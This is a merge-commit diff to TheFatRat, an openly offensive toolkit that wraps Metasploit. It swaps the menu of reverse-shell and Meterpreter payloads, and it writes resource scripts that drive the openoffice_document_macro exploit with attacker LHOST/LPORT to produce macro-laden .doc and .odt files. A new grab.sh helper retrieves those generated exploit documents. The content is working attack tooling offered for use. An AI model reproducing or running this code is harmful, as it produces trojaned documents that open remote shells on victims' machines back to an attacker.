Merge pull request #133 from peterpt/master

1.9.4_ patch 06

CHANGELOG.md

@@ -1,4 +1,5 @@
 ## CHANGELOG
+* v1.9.4 - Fix in microsploit option 5 , grab script created to get msfconsole generated payload while running
 * v1.9.4 - Fatrat will be full terminal mode , Powerstage tool added , Setup script rebuilded
 * v1.9.3 - Added update script
 * v1.9.3 - Dex2Jar will be installed from now on from Fatrat setup manually on user system (reason: Kali repo still uses old version)

fatrat

@@ -72,6 +72,7 @@ apkconfig=$path/config/apk.tmp
 unzip=unzip
 temp=$path/temp
 file="config/config.path"
+grab="config/grab.conf"
 meterp="$path/temp/meterpreter.rc"
 outf="app_backdoor.apk"
 msploit=$path/logs/msploit.log
@@ -114,6 +115,16 @@ spinlong2 ()
         sleep 0.02
     done
 }
+# Check if configuration file for grab script exists in /config folder
+# Case grab config does not exist then create a default config with 60 seconds
+if [ ! -f $grab ]
+then
+echo "------------------------------------------------------------" > $grab
+echo "| Timeout configuration for Msfconsole file Grabber Script |" >> $grab
+echo "------------------------------------------------------------" >> $grab
+echo "60" >> $grab
+fi
+
 # Default Local Host & Port file creation function
 function confdefault () {
 clear
@@ -678,15 +689,15 @@ esac
 # Linux multi msfvenom payload selection
 function pldmul() {
 echo ""
-echo -e $orange "  +-----------------------------------------+"
+echo -e $orange "  +------------------------------------------+"
 echo -e $orange "  |$white [$okegreen 1$white ]$yellow python/meterpreter/reverse_tcp$orange     |"
-echo -e $orange "  |$white [$okegreen 2$white ]$yellow linux/x86/shell_reverse_tcp$orange       |"
-echo -e $orange "  |$white [$okegreen 3$white ]$yellow linux/x86/meterpreter/reverse_tcp$orange |"
-echo -e $orange "  |$white [$okegreen 4$white ]$yellow osx/armle/shell_reverse_tcp$orange       |"
-echo -e $orange "  |$white [$okegreen 5$white ]$yellow osx/ppc/shell_reverse_tcp$orange         |"
-echo -e $orange "  |$white [$okegreen 6$white ]$yellow bsd/x86/shell/reverse_tcp$orange         |"
-echo -e $orange "  |$white [$okegreen 7$white ]$yellow solaris/x86/shell_reverse_tcp$orange     |"
-echo -e $orange "  +-----------------------------------------+"
+echo -e $orange "  |$white [$okegreen 2$white ]$yellow python/meterpreter/reverse_http$orange    |"
+echo -e $orange "  |$white [$okegreen 3$white ]$yellow python/meterpreter/reverse_https$orange   |"
+echo -e $orange "  |$white [$okegreen 4$white ]$yellow python/meterpreter_reverse_http$orange    |"
+echo -e $orange "  |$white [$okegreen 5$white ]$yellow python/meterpreter_reverse_https$orange   |"
+echo -e $orange "  |$white [$okegreen 6$white ]$yellow python/shell_reverse_tcp$orange           |"
+echo -e $orange "  |$white [$okegreen 7$white ]$yellow python/meterpreter/reverse_tcp_ssl$orange |"
+echo -e $orange "  +------------------------------------------+"
 echo ""
 echo -ne $okegreen "  Choose Payload : ";tput sgr0
 read pld
@@ -695,22 +706,22 @@ case $pld in
 payload="python/meterpreter/reverse_tcp"
 ;;
 2)
-payload="linux/x86/shell_reverse_tcp"
+payload="python/meterpreter/reverse_http"
 ;;
 3)
-payload="linux/x86/meterpreter/reverse_tcp"
+payload="python/meterpreter/reverse_https"
 ;;
 4)
-payload="osx/armle/shell_reverse_tcp"
+payload="python/meterpreter_reverse_http"
 ;;
 5)
-payload="osx/ppc/shell_reverse_tcp"
+payload="python/meterpreter_reverse_https"
 ;;
 6)
-payload="bsd/x86/shell/reverse_tcp"
+payload="python/shell_reverse_tcp"
 ;;
 7)
-payload="solaris/x86/shell_reverse_tcp"
+payload="python/meterpreter/reverse_tcp_ssl"
 ;;
 *)
 echo ""
@@ -2923,6 +2934,7 @@ function microsploit() {
 #code by edo maland > screetsec
 #part of fatrat feature
 #compatible with metasploit metasploit v4.14.0-dev { new payload in metasp 2017 like macro}
+rm -rf $msploit >/dev/null 2>&1
 
 APPNAME='Microsfot Metasploit Packet [ Easy ]'
 VERSION='1.0.0'
@@ -3003,18 +3015,23 @@ case $choice in
           echo "set LPORT $yourport" >> $meterp
           echo "set FILENAME $fira.doc" >> $meterp
           echo "exploit" >> $meterp
-          echo "exit -y" >> $meterp
           msploitr
-         	xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee temp/xterm.tmp"
+          msft="$path/temp/msff"
+          echo "$fira.doc" > "$msft" 
+          chmod +x "$path/grab" > /dev/null 2>&1
+
+#On this option grab script must be used to get the generated exploit by msfconsole 
+#With option on msfconsole exit -y , msfconsole is not able to generate the doc file properly 
+
+          gnome-terminal -t "grab" --geometry=600x400 --working-directory="$path" -e "bash -c '$path/grab.sh'; bash"
+         	xterm -T "Microsploit" -geometry 110x23 -e "$msfconsole -r $meterp | tee temp/xterm.tmp"
           rm -rf $meterp >/dev/null 2>&1
+          rm -rf $path/temp/msff >/dev/null 2>&1
           cat $path/temp/xterm.tmp | while read LINE
                 do
                 echo $LINE >> $msploit
                 done
                 rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
-
-         	echo ""
-         	mv ~/.msf4/local/$fira.doc $path/output/$fira.doc >/dev/null 2>&1
       	    	echo -e $okegreen""
                 fidoc=$path/output/$fira.doc
                 if [ -f "$fidoc" ]
@@ -3375,23 +3392,29 @@ fi
           rm -rf $path/temp/* >/dev/null 2>&1
           touch $meterp
           echo "use exploit/multi/misc/openoffice_document_macro" >$meterp
+          echo "set target 0" >> $meterp
           echo "set PAYLOAD $payload" >> $meterp
           echo "set LHOST $yourip" >> $meterp
           echo "set LPORT $yourport" >> $meterp
           echo "set FILENAME $fira.odt" >> $meterp
           echo "set BODY $bodys" >> $meterp
           echo "exploit" >> $meterp
-          echo "exit -y" >> $meterp
           msploitr
-          xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
+          msft="$path/temp/msff"
+          echo "$fira.odt" > "$msft" 
+          chmod +x "$path/grab" > /dev/null 2>&1
+
+#On this option grab script must be used to get the generated exploit by msfconsole 
+#With option on msfconsole exit -y , msfconsole is not able to generate the odt file properly 
+          gnome-terminal -t "grab" --geometry=600x400 --working-directory="$path" -e "bash -c '$path/grab.sh'; bash"
+          xterm -T "Microsploit" -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
           rm -rf $meterp >/dev/null 2>&1
+          rm -rf $msff >/dev/null 2>&1
                 cat $path/temp/xterm.tmp | while read LINE
                 do
                 echo $LINE >> $msploit
                 done
                 rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
-         	echo ""
-         	mv ~/.msf4/local/$fira.odt $path/output/$fira.odt >>$msploit 2>&1
          	echo -e $okegreen""
          	fidoc=$path/output/$fira.odt
                 if [ -f "$fidoc" ]
@@ -3461,23 +3484,30 @@ fi
           rm -rf $path/temp/* >/dev/null 2>&1
           touch $meterp
           echo "use exploit/multi/misc/openoffice_document_macro" >$meterp
+          echo "set target 1" >> $meterp
           echo "set PAYLOAD $payload" >> $meterp
           echo "set LHOST $yourip" >> $meterp
           echo "set LPORT $yourport" >> $meterp
           echo "set FILENAME $fira.odt" >> $meterp
           echo "set BODY $bodys" >> $meterp
           echo "exploit" >> $meterp
-          echo "exit -y" >> $meterp
           msploitr
-         	xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
+          msft="$path/temp/msff"
+          echo "$fira.odt" > "$msft" 
+          chmod +x "$path/grab" > /dev/null 2>&1
+
+#On this option grab script must be used to get the generated exploit by msfconsole 
+#With option on msfconsole exit -y , msfconsole is not able to generate the odt file properly 
+          gnome-terminal -t "grab" --geometry=600x400 --working-directory="$path" -e "bash -c '$path/grab.sh'; bash"
+         	xterm -T "Microsploit" -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
           rm -rf $meterp >/dev/null 2>&1
+          rm -rf $path/temp/msff >/dev/null 2>&1
                 cat $path/temp/xterm.tmp | while read LINE
                 do
                 echo $LINE >> $msploit
                 done
                 rm -rf $path/temp/xterm.tmp >/dev/null 2>&1
          	echo ""
-         	mv ~/.msf4/local/$fira.odt $path/output/$fira.odt >>$msploit 2>&1
          	echo -e $okegreen""
          	fidoc=$path/output/$fira.odt
                 if [ -f "$fidoc" ]

grab.sh

@@ -0,0 +1,110 @@
+#!/bin/bash
+
+#Grab script was build by peterpt exclusively for fatrat 1.9.4
+#Grab script waits for a msfconsole script output and then copy that output to a final folder ,
+#Grab script will close automatically the msfconsole window generated by fatrat
+#closes the active msfconsole terminal automatically and autoclose itself .
+#This script cannot work indenpendently from fatrat
+
+#colours variables
+cyan='\e[0;36m'
+green='\e[0;34m'
+okegreen='\033[92m'
+lightgreen='\e[1;32m'
+white='\e[1;37m'
+red='\e[1;31m'
+yellow='\e[0;33m'
+BlueF='\e[1;34m' #Biru
+RESET="\033[00m" #normal
+orange='\e[38;5;166m'
+
+path=`pwd` #Set path variable
+file=temp/msff #Filename to search in metasploit output folder
+conf=config/grab.conf #Maximum time to wait for all process to be done
+
+#If timeout configuration file does not exist then abort script
+if [ ! -f "$conf" ]
+then
+echo "Timeout configuration was not found"
+echo "Aborting"
+exit
+else
+
+#timeout configuration file found , read the 4th line
+tmo=`sed -n 4p $conf`
+fi
+
+#Clean metasploit output folder (in case a previous file with same name was created)
+rm -rf $HOME/.msf4/local/* >/dev/null 2>&1
+
+# Look for the name of the file to be search in metasploit output in msff
+# msff file will be created by fatrat
+
+if [ -f "$file" ]
+then
+
+#msff file exists then read 1st line (filename to search)
+var=`sed -n 1p $file`
+else
+#msff does not exist , abort
+exit 1
+fi
+function outf(){
+clear
+echo -e $orange   "---------------------------------------------------"
+echo -e $orange "|$okegreen       Grab Script 1.0 (fatrat 1.9.4 edition)$orange    |"
+echo -e $orange   "---------------------------------------------------"
+echo -e $okegreen "Second : $sleep  - Timeout : $tmo"
+echo ""
+echo -e $okegreen "Waiting for msfconsole output to be generated in Xterm Window"
+#set directory to search for file , and filename
+out="$HOME/.msf4/local/$var"
+
+#sleep variable is equal to itself + 1 second
+sleep=$((sleep+1))
+if [ $sleep == "$tmo" ] 
+then
+
+#in case timeout value achieved without any metasploit output file created
+#then exits this script
+
+echo "Metasploit did not generated any output or your timeout is short"
+pkill -f Microsploit > /dev/null 2>&1
+exit 1
+fi
+
+#File was created by metasploit , copy it to final destination , kill msfconsole window and auto-close this script
+if [ -f $out ]; then
+mv $HOME/.msf4/local/$var $path/output/$var
+
+#Look in active processes a process name "Microsploit" and kill it
+pkill -f Microsploit > /dev/null 2>&1
+exit 1
+else
+
+#metasploit output file was not yet found , wait 1 second
+sleep 1
+
+# start again
+outf
+fi
+}
+echo -e $orange   "---------------------------------------------------"
+echo -e $orange "|$okegreen       Grab Script 1.0 (fatrat 1.9.4 edition)$orange    |"
+echo -e $orange   "---------------------------------------------------"
+echo -e $okegreen " Dont close this window , it will autoclose itself"
+echo ""
+echo -e $okegreen "Waiting for msfconsole output to be generated in Xterm Window"
+echo -e $orange "Max waiting time = $tmo seconds"
+#if the current value from msff is empty then abort this script
+#this will mean that msff file exists but does not have anything written
+if [ -z "$var" ]
+then 
+exit 1
+fi
+
+#set sleep variable to 1 second
+sleep="1"
+
+#Everything is ok until this point , start loop until timeout 
+outf